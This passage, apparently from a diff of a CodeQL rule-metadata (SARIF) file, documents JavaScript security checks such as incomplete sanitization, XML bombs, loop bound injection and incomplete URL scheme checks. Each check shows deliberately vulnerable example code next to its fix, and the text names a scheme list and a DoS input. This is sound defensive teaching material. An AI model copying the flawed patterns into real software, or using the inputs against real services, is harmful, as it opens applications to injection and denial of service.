This will make the test pass, even though `x` does not end with `y`.\n\nTo avoid this, explicitly check for the -1 case:\n\n\n```javascript\nfunction endsWith(x, y) {\n let index = x.lastIndexOf(y);\n return index !== -1 && index === x.length - y.length;\n}\n\n```\n\n## References\n* MDN: [String.prototype.endsWith](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith)\n* MDN: [String.prototype.indexOf](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/indexOf)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" + }, + "properties" : { + "tags" : [ "security", "correctness", "external/cwe/cwe-020" ], + "description" : "Using indexOf to implement endsWith functionality is error-prone if the -1 case is not explicitly handled.", + "id" : "js/incorrect-suffix-check", + "kind" : "problem", + "name" : "Incorrect suffix check", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.8" + } + }, { + "id" : "js/useless-regexp-character-escape", + "name" : "js/useless-regexp-character-escape", + "shortDescription" : { + "text" : "Useless regular-expression character escape" + }, + "fullDescription" : { + "text" : "Prepending a backslash to an ordinary character in a string does not have any effect, and may make regular expressions constructed from this string behave unexpectedly." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Useless regular-expression character escape\nWhen a character in a string literal or regular expression literal is preceded by a backslash, it is interpreted as part of an escape sequence. For example, the escape sequence `\\n` in a string literal corresponds to a single `newline` character, and not the `\\` and `n` characters. However, not all characters change meaning when used in an escape sequence. 
In this case, the backslash just makes the character appear to mean something else, and the backslash actually has no effect. For example, the escape sequence `\\k` in a string literal just means `k`. Such superfluous escape sequences are usually benign, and do not change the behavior of the program.\n\nThe set of characters that change meaning when in escape sequences is different for regular expression literals and string literals. This can be problematic when a regular expression literal is turned into a regular expression that is built from one or more string literals. The problem occurs when a regular expression escape sequence loses its special meaning in a string literal.\n\n\n## Recommendation\nEnsure that the right amount of backslashes is used when escaping characters in strings, template literals and regular expressions. Pay special attention to the number of backslashes when rewriting a regular expression as a string literal.\n\n\n## Example\nThe following example code checks that a string is `\"my-marker\"`, possibly surrounded by white space:\n\n\n```javascript\nlet regex = new RegExp('(^\\s*)my-marker(\\s*$)'),\n isMyMarkerText = regex.test(text);\n\n```\nHowever, the check does not work properly for white space as the two `\\s` occurrences are semantically equivalent to just `s`, meaning that the check will succeed for strings like `\"smy-markers\"` instead of `\" my-marker \"`. 
Address these shortcomings by either using a regular expression literal (`/(^\\s*)my-marker(\\s*$)/`), or by adding extra backslashes (`'(^\\\\s*)my-marker(\\\\s*$)'`).\n\n\n## References\n* MDN: [Regular expression escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#Escaping)\n* MDN: [String escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", + "markdown" : "# Useless regular-expression character escape\nWhen a character in a string literal or regular expression literal is preceded by a backslash, it is interpreted as part of an escape sequence. For example, the escape sequence `\\n` in a string literal corresponds to a single `newline` character, and not the `\\` and `n` characters. However, not all characters change meaning when used in an escape sequence. In this case, the backslash just makes the character appear to mean something else, and the backslash actually has no effect. For example, the escape sequence `\\k` in a string literal just means `k`. Such superfluous escape sequences are usually benign, and do not change the behavior of the program.\n\nThe set of characters that change meaning when in escape sequences is different for regular expression literals and string literals. This can be problematic when a regular expression literal is turned into a regular expression that is built from one or more string literals. The problem occurs when a regular expression escape sequence loses its special meaning in a string literal.\n\n\n## Recommendation\nEnsure that the right amount of backslashes is used when escaping characters in strings, template literals and regular expressions. 
Pay special attention to the number of backslashes when rewriting a regular expression as a string literal.\n\n\n## Example\nThe following example code checks that a string is `\"my-marker\"`, possibly surrounded by white space:\n\n\n```javascript\nlet regex = new RegExp('(^\\s*)my-marker(\\s*$)'),\n isMyMarkerText = regex.test(text);\n\n```\nHowever, the check does not work properly for white space as the two `\\s` occurrences are semantically equivalent to just `s`, meaning that the check will succeed for strings like `\"smy-markers\"` instead of `\" my-marker \"`. Address these shortcomings by either using a regular expression literal (`/(^\\s*)my-marker(\\s*$)/`), or by adding extra backslashes (`'(^\\\\s*)my-marker(\\\\s*$)'`).\n\n\n## References\n* MDN: [Regular expression escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#Escaping)\n* MDN: [String escape notation](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String#Escape_notation)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-020" ], + "description" : "Prepending a backslash to an ordinary character in a string\n does not have any effect, and may make regular expressions constructed from this string\n behave unexpectedly.", + "id" : "js/useless-regexp-character-escape", + "kind" : "problem", + "name" : "Useless regular-expression character escape", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.8" + } + }, { + "id" : "js/overly-large-range", + "name" : "js/overly-large-range", + "shortDescription" : { + "text" : "Overly permissive regular expression range" + }, + "fullDescription" : { + "text" : "Overly permissive regular expression ranges match a wider range of characters than intended. This may allow an attacker to bypass a filter or sanitizer." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Overly permissive regular expression range\nIt's easy to write a regular expression range that matches a wider range of characters than you intended. For example, `/[a-zA-z]/` matches all lowercase and all uppercase letters, as you would expect, but it also matches the characters: `` [ \\ ] ^ _ ` ``.\n\nAnother common problem is failing to escape the dash character in a regular expression. An unescaped dash is interpreted as part of a range. For example, in the character class `[a-zA-Z0-9%=.,-_]` the last character range matches the 55 characters between `,` and `_` (both included), which overlaps with the range `[0-9]` and is clearly not intended by the writer.\n\n\n## Recommendation\nAvoid any confusion about which characters are included in the range by writing unambiguous regular expressions. Always check that character ranges match only the expected characters.\n\n\n## Example\nThe following example code is intended to check whether a string is a valid 6 digit hex color.\n\n```javascript\n\nfunction isValidHexColor(color) {\n return /^#[0-9a-fA-f]{6}$/i.test(color);\n}\n\n```\nHowever, the `A-f` range is overly large and matches every uppercase character. 
It would parse a \"color\" like `#XXYYZZ` as valid.\n\nThe fix is to use an uppercase `A-F` range instead.\n\n```javascript\n\nfunction isValidHexColor(color) {\n return /^#[0-9A-F]{6}$/i.test(color);\n}\n\n```\n\n## References\n* GitHub Advisory Database: [CVE-2021-42740: Improper Neutralization of Special Elements used in a Command in Shell-quote](https://github.com/advisories/GHSA-g4rg-993r-mgx7)\n* wh0.github.io: [Exploiting CVE-2021-42740](https://wh0.github.io/2021/10/28/shell-quote-rce-exploiting.html)\n* Yosuke Ota: [no-obscure-range](https://ota-meshi.github.io/eslint-plugin-regexp/rules/no-obscure-range.html)\n* Paul Boyd: [The regex \\[,-.\\]](https://pboyd.io/posts/comma-dash-dot/)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", + "markdown" : "# Overly permissive regular expression range\nIt's easy to write a regular expression range that matches a wider range of characters than you intended. For example, `/[a-zA-z]/` matches all lowercase and all uppercase letters, as you would expect, but it also matches the characters: `` [ \\ ] ^ _ ` ``.\n\nAnother common problem is failing to escape the dash character in a regular expression. An unescaped dash is interpreted as part of a range. For example, in the character class `[a-zA-Z0-9%=.,-_]` the last character range matches the 55 characters between `,` and `_` (both included), which overlaps with the range `[0-9]` and is clearly not intended by the writer.\n\n\n## Recommendation\nAvoid any confusion about which characters are included in the range by writing unambiguous regular expressions. Always check that character ranges match only the expected characters.\n\n\n## Example\nThe following example code is intended to check whether a string is a valid 6 digit hex color.\n\n```javascript\n\nfunction isValidHexColor(color) {\n return /^#[0-9a-fA-f]{6}$/i.test(color);\n}\n\n```\nHowever, the `A-f` range is overly large and matches every uppercase character. 
It would parse a \"color\" like `#XXYYZZ` as valid.\n\nThe fix is to use an uppercase `A-F` range instead.\n\n```javascript\n\nfunction isValidHexColor(color) {\n return /^#[0-9A-F]{6}$/i.test(color);\n}\n\n```\n\n## References\n* GitHub Advisory Database: [CVE-2021-42740: Improper Neutralization of Special Elements used in a Command in Shell-quote](https://github.com/advisories/GHSA-g4rg-993r-mgx7)\n* wh0.github.io: [Exploiting CVE-2021-42740](https://wh0.github.io/2021/10/28/shell-quote-rce-exploiting.html)\n* Yosuke Ota: [no-obscure-range](https://ota-meshi.github.io/eslint-plugin-regexp/rules/no-obscure-range.html)\n* Paul Boyd: [The regex \\[,-.\\]](https://pboyd.io/posts/comma-dash-dot/)\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-020" ], + "description" : "Overly permissive regular expression ranges match a wider range of characters than intended.\n This may allow an attacker to bypass a filter or sanitizer.", + "id" : "js/overly-large-range", + "kind" : "problem", + "name" : "Overly permissive regular expression range", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "5.0" + } + }, { + "id" : "js/incomplete-url-scheme-check", + "name" : "js/incomplete-url-scheme-check", + "shortDescription" : { + "text" : "Incomplete URL scheme check" + }, + "fullDescription" : { + "text" : "Checking for the \"javascript:\" URL scheme without also checking for \"vbscript:\" and \"data:\" suggests a logic error or even a security vulnerability." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Incomplete URL scheme check\nURLs starting with `javascript:` can be used to encode JavaScript code to be executed when the URL is visited. 
While this is a powerful mechanism for creating feature-rich and responsive web applications, it is also a potential security risk: if the URL comes from an untrusted source, it might contain harmful JavaScript code. For this reason, many frameworks and libraries first check the URL scheme of any untrusted URL, and reject URLs with the `javascript:` scheme.\n\nHowever, the `data:` and `vbscript:` schemes can be used to represent executable code in a very similar way, so any validation logic that checks against `javascript:`, but not against `data:` and `vbscript:`, is likely to be insufficient.\n\n\n## Recommendation\nAdd checks covering both `data:` and `vbscript:`.\n\n\n## Example\nThe following function validates a (presumably untrusted) URL `url`. If it starts with `javascript:` (case-insensitive and potentially preceded by whitespace), the harmless placeholder URL `about:blank` is returned to prevent code injection; otherwise `url` itself is returned.\n\n\n```javascript\nfunction sanitizeUrl(url) {\n let u = decodeURI(url).trim().toLowerCase();\n if (u.startsWith(\"javascript:\"))\n return \"about:blank\";\n return url;\n}\n\n```\nWhile this check provides partial projection, it should be extended to cover `data:` and `vbscript:` as well:\n\n\n```javascript\nfunction sanitizeUrl(url) {\n let u = decodeURI(url).trim().toLowerCase();\n if (u.startsWith(\"javascript:\") || u.startsWith(\"data:\") || u.startsWith(\"vbscript:\"))\n return \"about:blank\";\n return url;\n}\n\n```\n\n## References\n* WHATWG: [URL schemes](https://wiki.whatwg.org/wiki/URL_schemes).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n", + "markdown" : "# Incomplete URL scheme check\nURLs starting with `javascript:` can be used to encode JavaScript code to be executed when the URL is visited. 
While this is a powerful mechanism for creating feature-rich and responsive web applications, it is also a potential security risk: if the URL comes from an untrusted source, it might contain harmful JavaScript code. For this reason, many frameworks and libraries first check the URL scheme of any untrusted URL, and reject URLs with the `javascript:` scheme.\n\nHowever, the `data:` and `vbscript:` schemes can be used to represent executable code in a very similar way, so any validation logic that checks against `javascript:`, but not against `data:` and `vbscript:`, is likely to be insufficient.\n\n\n## Recommendation\nAdd checks covering both `data:` and `vbscript:`.\n\n\n## Example\nThe following function validates a (presumably untrusted) URL `url`. If it starts with `javascript:` (case-insensitive and potentially preceded by whitespace), the harmless placeholder URL `about:blank` is returned to prevent code injection; otherwise `url` itself is returned.\n\n\n```javascript\nfunction sanitizeUrl(url) {\n let u = decodeURI(url).trim().toLowerCase();\n if (u.startsWith(\"javascript:\"))\n return \"about:blank\";\n return url;\n}\n\n```\nWhile this check provides partial projection, it should be extended to cover `data:` and `vbscript:` as well:\n\n\n```javascript\nfunction sanitizeUrl(url) {\n let u = decodeURI(url).trim().toLowerCase();\n if (u.startsWith(\"javascript:\") || u.startsWith(\"data:\") || u.startsWith(\"vbscript:\"))\n return \"about:blank\";\n return url;\n}\n\n```\n\n## References\n* WHATWG: [URL schemes](https://wiki.whatwg.org/wiki/URL_schemes).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n" + }, + "properties" : { + "tags" : [ "security", "correctness", "external/cwe/cwe-020", "external/cwe/cwe-184" ], + "description" : "Checking for the \"javascript:\" URL scheme without also checking for \"vbscript:\"\n and 
\"data:\" suggests a logic error or even a security vulnerability.", + "id" : "js/incomplete-url-scheme-check", + "kind" : "problem", + "name" : "Incomplete URL scheme check", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.8" + } + }, { + "id" : "js/xml-bomb", + "name" : "js/xml-bomb", + "shortDescription" : { + "text" : "XML internal entity expansion" + }, + "fullDescription" : { + "text" : "Parsing user input as an XML document with arbitrary internal entity expansion is vulnerable to denial-of-service attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# XML internal entity expansion\nParsing untrusted XML files with a weakly configured XML parser may be vulnerable to denial-of-service (DoS) attacks exploiting uncontrolled internal entity expansion.\n\nIn XML, so-called *internal entities* are a mechanism for introducing an abbreviation for a piece of text or part of a document. When a parser that has been configured to expand entities encounters a reference to an internal entity, it replaces the entity by the data it represents. The replacement text may itself contain other entity references, which are expanded recursively. This means that entity expansion can increase document size dramatically.\n\nIf untrusted XML is parsed with entity expansion enabled, a malicious attacker could submit a document that contains very deeply nested entity definitions, causing the parser to take a very long time or use large amounts of memory. This is sometimes called an *XML bomb* attack.\n\n\n## Recommendation\nThe safest way to prevent XML bomb attacks is to disable entity expansion when parsing untrusted data. How this is done depends on the library being used. 
Note that some libraries, such as recent versions of `libxmljs` (though not its SAX parser API), disable entity expansion by default, so unless you have explicitly enabled entity expansion, no further action is needed.\n\n\n## Example\nThe following example uses the XML parser provided by the `node-expat` package to parse a string `xmlSrc`. If that string is from an untrusted source, this code may be vulnerable to a DoS attack, since `node-expat` expands internal entities by default:\n\n\n```javascript\nconst app = require(\"express\")(),\n expat = require(\"node-expat\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n parser = new expat.Parser();\n parser.on(\"startElement\", handleStart);\n parser.on(\"text\", handleText);\n parser.write(xmlSrc);\n});\n\n```\nAt the time of writing, `node-expat` does not provide a way of controlling entity expansion, but the example could be rewritten to use the `sax` package instead, which only expands standard entities such as `&`:\n\n\n```javascript\nconst app = require(\"express\")(),\n sax = require(\"sax\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n parser = sax.parser(true);\n parser.onopentag = handleStart;\n parser.ontext = handleText;\n parser.write(xmlSrc);\n});\n\n```\n\n## References\n* Wikipedia: [Billion Laughs](https://en.wikipedia.org/wiki/Billion_laughs).\n* Bryan Sullivan: [Security Briefs - XML Denial of Service Attacks and Defenses](https://msdn.microsoft.com/en-us/magazine/ee335713.aspx).\n* Common Weakness Enumeration: [CWE-776](https://cwe.mitre.org/data/definitions/776.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", + "markdown" : "# XML internal entity expansion\nParsing untrusted XML files with a weakly configured XML parser may be vulnerable to denial-of-service (DoS) attacks exploiting uncontrolled internal entity expansion.\n\nIn XML, so-called *internal entities* are a mechanism for introducing an 
abbreviation for a piece of text or part of a document. When a parser that has been configured to expand entities encounters a reference to an internal entity, it replaces the entity by the data it represents. The replacement text may itself contain other entity references, which are expanded recursively. This means that entity expansion can increase document size dramatically.\n\nIf untrusted XML is parsed with entity expansion enabled, a malicious attacker could submit a document that contains very deeply nested entity definitions, causing the parser to take a very long time or use large amounts of memory. This is sometimes called an *XML bomb* attack.\n\n\n## Recommendation\nThe safest way to prevent XML bomb attacks is to disable entity expansion when parsing untrusted data. How this is done depends on the library being used. Note that some libraries, such as recent versions of `libxmljs` (though not its SAX parser API), disable entity expansion by default, so unless you have explicitly enabled entity expansion, no further action is needed.\n\n\n## Example\nThe following example uses the XML parser provided by the `node-expat` package to parse a string `xmlSrc`. 
If that string is from an untrusted source, this code may be vulnerable to a DoS attack, since `node-expat` expands internal entities by default:\n\n\n```javascript\nconst app = require(\"express\")(),\n expat = require(\"node-expat\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n parser = new expat.Parser();\n parser.on(\"startElement\", handleStart);\n parser.on(\"text\", handleText);\n parser.write(xmlSrc);\n});\n\n```\nAt the time of writing, `node-expat` does not provide a way of controlling entity expansion, but the example could be rewritten to use the `sax` package instead, which only expands standard entities such as `&`:\n\n\n```javascript\nconst app = require(\"express\")(),\n sax = require(\"sax\");\n\napp.post(\"upload\", (req, res) => {\n let xmlSrc = req.body,\n parser = sax.parser(true);\n parser.onopentag = handleStart;\n parser.ontext = handleText;\n parser.write(xmlSrc);\n});\n\n```\n\n## References\n* Wikipedia: [Billion Laughs](https://en.wikipedia.org/wiki/Billion_laughs).\n* Bryan Sullivan: [Security Briefs - XML Denial of Service Attacks and Defenses](https://msdn.microsoft.com/en-us/magazine/ee335713.aspx).\n* Common Weakness Enumeration: [CWE-776](https://cwe.mitre.org/data/definitions/776.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-776", "external/cwe/cwe-400" ], + "description" : "Parsing user input as an XML document with arbitrary internal\n entity expansion is vulnerable to denial-of-service attacks.", + "id" : "js/xml-bomb", + "kind" : "path-problem", + "name" : "XML internal entity expansion", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/loop-bound-injection", + "name" : "js/loop-bound-injection", + "shortDescription" : { + "text" : "Loop bound injection" + }, + "fullDescription" : { + "text" : "Iterating over an object 
with a user-controlled .length property can cause indefinite looping." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Loop bound injection\nUsing the `.length` property of an untrusted object as a loop bound may cause indefinite looping since a malicious attacker can set the `.length` property to a very large number. For example, when a program that expects an array is passed a JSON object such as `{length: 1e100}`, the loop will be run for 10100 iterations. This may cause the program to hang or run out of memory, which can be used to mount a denial-of-service (DoS) attack.\n\n\n## Recommendation\nEither check that the object is indeed an array or limit the size of the `.length` property.\n\n\n## Example\nIn the example below, an HTTP request handler iterates over a user-controlled object `obj` using the `obj.length` property in order to copy the elements from `obj` to an array.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.post(\"/foo\", (req, res) => {\n var obj = req.body;\n\n var ret = [];\n\n // Potential DoS if obj.length is large.\n for (var i = 0; i < obj.length; i++) {\n ret.push(obj[i]);\n }\n});\n\n```\nThis is not secure since an attacker can control the value of `obj.length`, and thereby cause the loop to iterate indefinitely. 
Here the potential DoS is fixed by enforcing that the user-controlled object is an array.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.post(\"/foo\", (req, res) => {\n var obj = req.body;\n \n if (!(obj instanceof Array)) { // Prevents DoS.\n return [];\n }\n\n var ret = [];\n\n for (var i = 0; i < obj.length; i++) {\n ret.push(obj[i]);\n }\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-834](https://cwe.mitre.org/data/definitions/834.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n", + "markdown" : "# Loop bound injection\nUsing the `.length` property of an untrusted object as a loop bound may cause indefinite looping since a malicious attacker can set the `.length` property to a very large number. For example, when a program that expects an array is passed a JSON object such as `{length: 1e100}`, the loop will be run for 10100 iterations. This may cause the program to hang or run out of memory, which can be used to mount a denial-of-service (DoS) attack.\n\n\n## Recommendation\nEither check that the object is indeed an array or limit the size of the `.length` property.\n\n\n## Example\nIn the example below, an HTTP request handler iterates over a user-controlled object `obj` using the `obj.length` property in order to copy the elements from `obj` to an array.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.post(\"/foo\", (req, res) => {\n var obj = req.body;\n\n var ret = [];\n\n // Potential DoS if obj.length is large.\n for (var i = 0; i < obj.length; i++) {\n ret.push(obj[i]);\n }\n});\n\n```\nThis is not secure since an attacker can control the value of `obj.length`, and thereby cause the loop to iterate indefinitely. 
Here the potential DoS is fixed by enforcing that the user-controlled object is an array.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.post(\"/foo\", (req, res) => {\n var obj = req.body;\n \n if (!(obj instanceof Array)) { // Prevents DoS.\n return [];\n }\n\n var ret = [];\n\n for (var i = 0; i < obj.length; i++) {\n ret.push(obj[i]);\n }\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-834](https://cwe.mitre.org/data/definitions/834.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-834", "external/cwe/cwe-730" ], + "description" : "Iterating over an object with a user-controlled .length\n property can cause indefinite looping.", + "id" : "js/loop-bound-injection", + "kind" : "path-problem", + "name" : "Loop bound injection", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/exposure-of-private-files", + "name" : "js/exposure-of-private-files", + "shortDescription" : { + "text" : "Exposure of private files" + }, + "fullDescription" : { + "text" : "Exposing a node_modules folder, or the project folder to the public, can cause exposure of private information." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Exposure of private files\nLibraries like `express` provide easy methods for serving entire directories of static files from a web server. However, using these can sometimes lead to accidental information exposure. If for example the `node_modules` folder is served, then an attacker can access the `_where` field from a `package.json` file, which gives access to the absolute path of the file.\n\n\n## Recommendation\nLimit which folders of static files are served from a web server.\n\n\n## Example\nIn the example below, all the files from the `node_modules` are served. 
This allows clients to easily access all the files inside that folder, which includes potentially private information inside `package.json` files.\n\n\n```javascript\n\nvar express = require('express');\n\nvar app = express();\n\napp.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules')));\n```\nThe issue has been fixed below by only serving specific folders within the `node_modules` folder.\n\n\n```javascript\n\nvar express = require('express');\n\nvar app = express();\n\napp.use(\"jquery\", express.static('./node_modules/jquery/dist'));\napp.use(\"bootstrap\", express.static('./node_modules/bootstrap/dist'));\n```\n\n## References\n* OWASP: [Sensitive Data Exposure](https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-219](https://cwe.mitre.org/data/definitions/219.html).\n* Common Weakness Enumeration: [CWE-548](https://cwe.mitre.org/data/definitions/548.html).\n", + "markdown" : "# Exposure of private files\nLibraries like `express` provide easy methods for serving entire directories of static files from a web server. However, using these can sometimes lead to accidental information exposure. If for example the `node_modules` folder is served, then an attacker can access the `_where` field from a `package.json` file, which gives access to the absolute path of the file.\n\n\n## Recommendation\nLimit which folders of static files are served from a web server.\n\n\n## Example\nIn the example below, all the files from the `node_modules` are served. 
This allows clients to easily access all the files inside that folder, which includes potentially private information inside `package.json` files.\n\n\n```javascript\n\nvar express = require('express');\n\nvar app = express();\n\napp.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules')));\n```\nThe issue has been fixed below by only serving specific folders within the `node_modules` folder.\n\n\n```javascript\n\nvar express = require('express');\n\nvar app = express();\n\napp.use(\"jquery\", express.static('./node_modules/jquery/dist'));\napp.use(\"bootstrap\", express.static('./node_modules/bootstrap/dist'));\n```\n\n## References\n* OWASP: [Sensitive Data Exposure](https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-219](https://cwe.mitre.org/data/definitions/219.html).\n* Common Weakness Enumeration: [CWE-548](https://cwe.mitre.org/data/definitions/548.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-200", "external/cwe/cwe-219", "external/cwe/cwe-548" ], + "description" : "Exposing a node_modules folder, or the project folder to the public, can cause exposure\n of private information.", + "id" : "js/exposure-of-private-files", + "kind" : "problem", + "name" : "Exposure of private files", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "6.5" + } + }, { + "id" : "js/incomplete-sanitization", + "name" : "js/incomplete-sanitization", + "shortDescription" : { + "text" : "Incomplete string escaping or encoding" + }, + "fullDescription" : { + "text" : "A string transformer that does not replace or escape all occurrences of a meta-character may be ineffective." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Incomplete string escaping or encoding\nSanitizing untrusted input is a common technique for preventing injection attacks such as SQL injection or cross-site scripting. Usually, this is done by escaping meta-characters such as quotes in a domain-specific way so that they are treated as normal characters.\n\nHowever, directly using the string `replace` method to perform escaping is notoriously error-prone. Common mistakes include only replacing the first occurrence of a meta-character, or backslash-escaping various meta-characters but not the backslash itself.\n\nIn the former case, later meta-characters are left undisturbed and can be used to subvert the sanitization. In the latter case, preceding a meta-character with a backslash leads to the backslash being escaped, but the meta-character appearing un-escaped, which again makes the sanitization ineffective.\n\nEven if the escaped string is not used in a security-critical context, incomplete escaping may still have undesirable effects, such as badly rendered or confusing output.\n\n\n## Recommendation\nUse a (well-tested) sanitization library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\nOtherwise, make sure to use a regular expression with the `g` flag to ensure that all occurrences are replaced, and remember to escape backslashes if applicable.\n\n\n## Example\nFor example, assume that we want to embed a user-controlled string `accountNumber` into a SQL query as part of a string literal. To avoid SQL injection, we need to ensure that the string does not contain un-escaped single-quote characters. 
The following function attempts to ensure this by doubling single quotes, and thereby escaping them:\n\n\n```javascript\nfunction escapeQuotes(s) {\n return s.replace(\"'\", \"''\");\n}\n\n```\nAs written, this sanitizer is ineffective: if the first argument to `replace` is a string literal (as in this case), only the *first* occurrence of that string is replaced.\n\nAs mentioned above, the function `escapeQuotes` should be replaced with a purpose-built sanitization library, such as the npm module `sqlstring`. Many other sanitization libraries are available from npm and other sources.\n\nIf this is not an option, `escapeQuotes` should be rewritten to use a regular expression with the `g` (\"global\") flag instead:\n\n\n```javascript\nfunction escapeQuotes(s) {\n return s.replace(/'/g, \"''\");\n}\n\n```\nNote that it is very important to include the global flag: `s.replace(/'/, \"''\")` *without* the global flag is equivalent to the first example above and only replaces the first quote.\n\n\n## References\n* OWASP Top 10: [A1 Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection).\n* npm: [sqlstring](https://www.npmjs.com/package/sqlstring) package.\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# Incomplete string escaping or encoding\nSanitizing untrusted input is a common technique for preventing injection attacks such as SQL injection or cross-site scripting. Usually, this is done by escaping meta-characters such as quotes in a domain-specific way so that they are treated as normal characters.\n\nHowever, directly using the string `replace` method to perform escaping is notoriously error-prone. 
Common mistakes include only replacing the first occurrence of a meta-character, or backslash-escaping various meta-characters but not the backslash itself.\n\nIn the former case, later meta-characters are left undisturbed and can be used to subvert the sanitization. In the latter case, preceding a meta-character with a backslash leads to the backslash being escaped, but the meta-character appearing un-escaped, which again makes the sanitization ineffective.\n\nEven if the escaped string is not used in a security-critical context, incomplete escaping may still have undesirable effects, such as badly rendered or confusing output.\n\n\n## Recommendation\nUse a (well-tested) sanitization library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\nOtherwise, make sure to use a regular expression with the `g` flag to ensure that all occurrences are replaced, and remember to escape backslashes if applicable.\n\n\n## Example\nFor example, assume that we want to embed a user-controlled string `accountNumber` into a SQL query as part of a string literal. To avoid SQL injection, we need to ensure that the string does not contain un-escaped single-quote characters. The following function attempts to ensure this by doubling single quotes, and thereby escaping them:\n\n\n```javascript\nfunction escapeQuotes(s) {\n return s.replace(\"'\", \"''\");\n}\n\n```\nAs written, this sanitizer is ineffective: if the first argument to `replace` is a string literal (as in this case), only the *first* occurrence of that string is replaced.\n\nAs mentioned above, the function `escapeQuotes` should be replaced with a purpose-built sanitization library, such as the npm module `sqlstring`. 
